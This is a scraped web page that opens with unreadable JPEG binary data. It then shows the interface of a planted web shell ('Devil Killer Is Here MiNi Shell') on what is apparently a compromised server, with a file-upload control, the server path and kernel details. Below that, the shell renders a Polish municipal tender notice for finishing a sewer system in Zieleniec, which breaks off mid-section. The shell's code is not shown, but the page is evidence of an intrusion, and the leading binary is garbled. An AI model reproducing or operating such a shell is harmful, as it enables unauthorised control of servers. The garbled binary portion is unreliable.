JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241211/0064724801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dokończenie budowy kanalizacji sanitarnej w Zieleńcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pokój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412740</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pokój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-034</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@gminapokoj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gminapokoj.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dokończenie budowy kanalizacji sanitarnej w Zieleńcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d9b6400-d8b6-4c61-9014-4c4014bcf204</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00647248</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00032961/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Dokończenie budowy kanalizacji sanitarnej w Zieleńcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d9b6400-d8b6-4c61-9014-4c4014bcf204 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się w j.polskim, przy<br/>użyciu Platformy e-Zamówienia (https://ezamowienia.gov.pl) oraz poczty elektronicznej Zamawiającego<br/>zamowieniapubliczne@gminapokoj.pl. Komunikacja z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w<br/>postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”<br/>(„Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”). Komunikacja może odbywać się również w uzasadnionych przypadkach za pośrednictwem<br/>poczty elektronicznej: zamowieniapubliczne@gminapokoj.pl (nie dotyczy ofert), adres strony<br/>internetowej:https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d9b6400-d8b6-4c61-9014-4c4014bcf204</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.1 W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>4.2 Korzystanie z platformy e – Zamówienia jest bezpłatne.<br/>4.3 Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>W zakresie procedury postępowania: Pani Agnieszka Hadamik tel. +48 (77) 4693080, email: zamowieniapubliczne@gminapokoj.pl<br/>W zakresie opisu przedmiotu zamówienia:<br/>Pani Beata Baron tel. +48 (77) 4693080,email: zamowieniapubliczne@gminapokoj.pl<br/>4.4.1 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie<br/>e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4.5 Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-<br/>Zamówienia ani logowania do platformy e-Zamówienia.<br/>4.6 Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie.<br/>4.7 Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały<br/>bezpośredniego zastosowania.<br/>4.8 Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>4.9 Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U.<br/>z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa”.<br/>Ze względu na ograniczoną ilość miejsca dalsza część informacji w rozdziale 4 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2. dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego<br/>na zadanie pn. „Dokończenie budowy kanalizacji sanitarnej w Zieleńcu”, prowadzonym w trybie podstawowym;<br/>3. odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych<br/>(Dz. U. z 2023 r. poz. 1605 z późn. zm.), dalej „ustawa Pzp”;<br/>4. dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>5. obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>6. w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7. Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/>o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz<br/>jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. Wykonawcy nie przysługuje:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>9. Informacja o ograniczeniach danych osobowych:<br/>-W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>-Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym<br/>z ustawą.<br/>-Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania<br/>o udzielenie zamówienia publicznego lub konkursu.<br/>-w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia (dotyczy<br/>przechowania protokołu wraz z załącznikami)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ST.I.271.20.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot niniejszego zamówienia stanowi wykonanie zadania pn. : „Dokończenie budowy kanalizacji sanitarnej w Zieleńcu”<br/>realizowane w ramach Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych. Przedmiot zamówienia jest<br/>podzielny na 2 części, w zakresie części 1 przedmiot zamówienia: roboty budowlane dokończenia budowy kanalizacji<br/>sanitarnej w Zieleńcu.1.2 Szczegółowy zakres Zadania:<br/>1) Zakres budowy kanalizacji sanitarnej w układzie grawitacyjno-tłocznym obejmuje: zgodnie z załączonymi mapami odcinek<br/>od wykonanej pompowni P-4 do pompowni<br/>P-6 z sieciami głównymi i rozdzielczymi oraz przykanalikami zgodnie z załączoną dokumentacją projektową. Parametry<br/>urządzeń i materiałów opisane w dokumentacji projektowej.<br/>2) Przepompownia P-5 i P-6 wykonana z polimerobetonu o średnicy wew. 1400 mm wraz z zasilaniem<br/>elektroenergetycznym, z wyposażeniem w rozdzielnie, szafy zasilająco-sterownicze ze sterownikami na warunkach<br/>wskazanych przez Ekowod Sp. z o.o. w Namysłowie.<br/>3) Przepompownie ścieków zlokalizowane są w obrębie lokalnego obniżenia terenu, gdzie drobne warstewki wodonośne<br/>zostaną przecięte, co spowoduje napływ wody do wykopu. Odwodnienie można prowadzić za pomocą drenażu lub zestawu<br/>igłofiltrów. Roboty ziemne przy układaniu sieci kanalizacyjnej należy wykonać odcinkami. Wykopy otwarte należy<br/>odpowiednio zabezpieczyć i odwodnić. Grunty spoiste są aktywne koloidalnie. Należy je chronić przed napływem wody.<br/>Poziom zwierciadła wody może ulegać okresowym wahaniom o amplitudzie +/- 1,0 m. Kategoria urabialności gruntów wg<br/>KNR III.<br/>4) Technologie informacyjno -komunikacyjne wykorzystane będą w monitorowaniu i zarządzaniu pracą przepompowni,<br/>korzystać z niej będą operatorzy systemu kanalizacyjnego.<br/>5) Stan pracy pompowni zostanie zobrazowany na wewnętrznej tablicy synoptycznej. Zastosowany zostanie sterownik ze<br/>zintegrowanym modułem GPRS, dane o pracy przepompowni wysyłane będą drogą komunikacji GSM/GPRS do centrum<br/>operatorskiego z systemu wizualizacji. Dzięki temu użytkownik ma przejrzystość stanu obiektu i możliwość zdalnej<br/>diagnostyki W tym przypadku istnieje również możliwość zdalnego sterowania pompami.<br/>6) Ze względu na włączenie przepompowni do istniejącego zewnętrznego systemu SCADA sterowanie przepompowni<br/>należy zrealizować w oparciu o sterownik przemysłowy kompatybilny z zainstalowanymi w pracującym istniejącym systemie,<br/>Siemens serii S7-1200, CPU 1214C, lub wyższy wraz z modułami rozszerzeń oraz sterownik komunikacyjny GPRS<br/>kompatybilny z zastosowanym w istniejącym systemie Cellbox U3, zapewniający kompatybilną komunikację i przesyłanie<br/>danych do systemu SCADA. Komunikacja RS232/ RS485. Protokół komunikacyjny ModBUS RTU. Możliwość wykonywania<br/>rozkazów zdalnych: start/stop pompowni, skasuj alarm włamania, skasuj alarm zbiorczy, zdalne kasowanie liczników<br/>włączeń i czasu pracy pomp (wyłączenie w trybie serwisowym), opcjonalnie na życzenie Użytkownika musi istnieć<br/>możliwość dodania innych rozkazów. Autoryzacja dostępu do nastaw na poziomie: „operator” (tylko odczyt) i „serwis” po<br/>podaniu hasła z panelu operatorskiego,<br/>7) Sterownik powinien umożliwiać podłączenie przepływomierza. Transmiter powinien posiadać 2 gniazda SIM i opcjonalnie<br/>obsługę 2 kart SIM niezależnych operatorów (bez dodatkowej dopłaty). Transmiter powinien automatycznie, niezależnie od<br/>sterownika nawiązywać sesję GPRS oraz posiadać konfigurowalny mechanizm autodiagnostyki sieci GPRS. Dostawca kart<br/>telemetrycznych pracujących w APNie zamkniętym powinien zapewnić wymiennie karty operatorów. PLUS GSM, ORANGE<br/>przynależnych do jednego APNu. O doborze końcowym karty telemetrycznej danego operatora dla obiektu będzie<br/>decydować jakość zasięgu radiowego sieci GSM. Wymagania dot. teletransmisji umożliwiające zachowanie funkcjonalności<br/>systemu SCADA. Zdalne sterowanie System telemetrii powinien posiadać następujące funkcje podlegające zdalnemu<br/>sterowaniu : Załączanie i wyłączanie powiadamiania SMS, Kasowanie awarii, Ustawianie poziomów: poziomu minimalnego<br/>sondy, poziomu wyłączenia pomp, poziomu włączenia pojedynczej pompy, poziomu dołączenie drugiej pompy, Możliwość<br/>zdalnego niezależnego blokowania i odblokowywania każdej z pomp pompowni oraz włączania i wyłączania jednoczesnej<br/>pracy dwóch pomp.<br/>8) Szczegółowy opis materiałów, urządzeń, wymagań, projektowanych rozwiązań technicznych oraz zakres i wytyczne<br/>wykonania robót zawarty jest w dokumentacji projektowej<br/>9) Roboty w zakresie odbudowy/ odtworzenia nawierzchni drogowych, w zakresie dróg gminnych odtworzenie dróg wykonać<br/>zgodnie z warunkami nr SG-IX.7234.22.2014 z dnia 13.03.2014 r. W zakresie drogi wojewódzkiej prace odtworzeniowe<br/>wykonać zgodnie z wytycznymi zarządcy drogi wojewódzkiej.<br/>10) Teren budowy w tym również teren nieruchomości prywatnych uporządkować i przywrócić do stanu pierwotnego.<br/>11) Przepompownie P-5 i P-6 zabezpieczyć ogrodzeniem stałym z siatki stalowej wys. 1,5 m. Powierzchnia ogrodzenia to<br/>4,0 x 4,0m = 16,0 m2. Teren ogrodowy utwardzony kostką brukową gr. 8 cm. Wjazd umożliwia brama stalowa z furtką (3,0 +<br/>1,0 m). Na terenie przepompowni wykonać stałe oświetlenie. Szczegółowe zagospodarowanie obrazują projekty<br/>zagospodarowania<br/>12)Zmiana sposobu wykonania sieci kanalizacji sanitarnej grawitacyjnej DN 150-200 w stosunku do dokumentacji<br/>projektowej:<br/>- z metody bezwykopowej na wykopową (odcinki S404-S412, S412- S415, S349-S381, S381-S382, S382-S383)<br/>- z metody wykopowej na bezwykopową (odcinek S395-S398) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów<br/>oceny ofert: Cena i Długość okresu gwarancji na wykonane roboty montażowe oraz zamontowane materiały i urządzenia.<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>punkt.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (PO) obliczoną na podstawie<br/>wzoru:PO = PC + PG gdzie: PO - łączna ilość punktów oferty ocenianej, PC - liczba punktów uzyskanych w kryterium „Cena”,PG -<br/>liczba punktów uzyskanych w kryterium „Długość okresu gwarancji na wykonane roboty budowlane oraz zamontowane materiały i<br/>urządzenia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wykonane roboty budowlane oraz zamontowane materiały i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów 